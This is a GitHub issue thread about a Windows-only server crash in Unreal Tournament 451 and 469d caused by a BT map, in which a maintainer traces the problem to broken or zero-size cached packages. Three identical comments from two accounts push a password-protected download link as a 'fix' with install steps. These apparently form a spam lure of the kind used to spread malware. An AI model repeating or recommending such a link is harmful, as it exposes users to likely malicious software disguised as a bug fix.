### ISSUE TITLE
Map crash 451/469d: "FFileManagerWindows.h" - reproducible

### ISSUE THREAD

**Issue by shai-ut99** [OldUnreal/UnrealTournamentPatches#1616]
A BT map called "[BT-ForCondemner-v2](http://www.i4games.eu/maps/CTF-BT-ForCondemner-v2.zip)" causes a server crash when voted on Windows based hosts for both 451 and 469d. The crash does not occur for Linux 469d servers with a (near) identical ServerActor and ServerPackages list, however.

On 451, the log shows: Critical: Assertion failed: InPos<=Size [File:..\..\Core\Inc\FFileManagerWindows.h] [Line: 57]

On 469d, the log shows: Critical: Assertion failed: InPos<=Size [File:C:\GameDev\UnrealTournament\Core\Inc\FFileManagerWindows.h] [Line: 90]

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by SeriousBuggie** [comment]
Can't reproduce crash. I start map on 469d and 469e dedicated servers - no crash.
Did it need be voted for crash?

Usually mention crash is caused by attempt read wrong file, which is not unreal package.

Please ensure you not have some things which name in same way as map dependencies, but contain something else.
Such stuff can be located in different folders.
```
Music (1)

    Las_ni

Unknown (24)

    Ambient
    AppleHouseTex
    Bedroom
    brektex
    BT
    CatchTheFrog
    Colors
    CrokxFX
    dino081199
    DireStraits
    DoorsSnd
    Evil-Lair-3
    Evil-Lair-6
    highway
    i4Games_BTScripts_200607
    mix
    MKsoundFX
    Nanoblue
    sky
    SLV2Sounds
    SoldierSkins_BTwarrior
    swpr_loop
    TO-Rig2_4UP
    WoTNature
```

Also that can be broken or incomplete one of this packages.
Please ensure size and content match with proper one.

**Comment by SeriousBuggie** [comment]
Can you upload log file from crash?

**Comment by SeriousBuggie** [comment]
Check your Cache folder. There will be appear 0 size files. Delete them.
We already fix that for 469e.
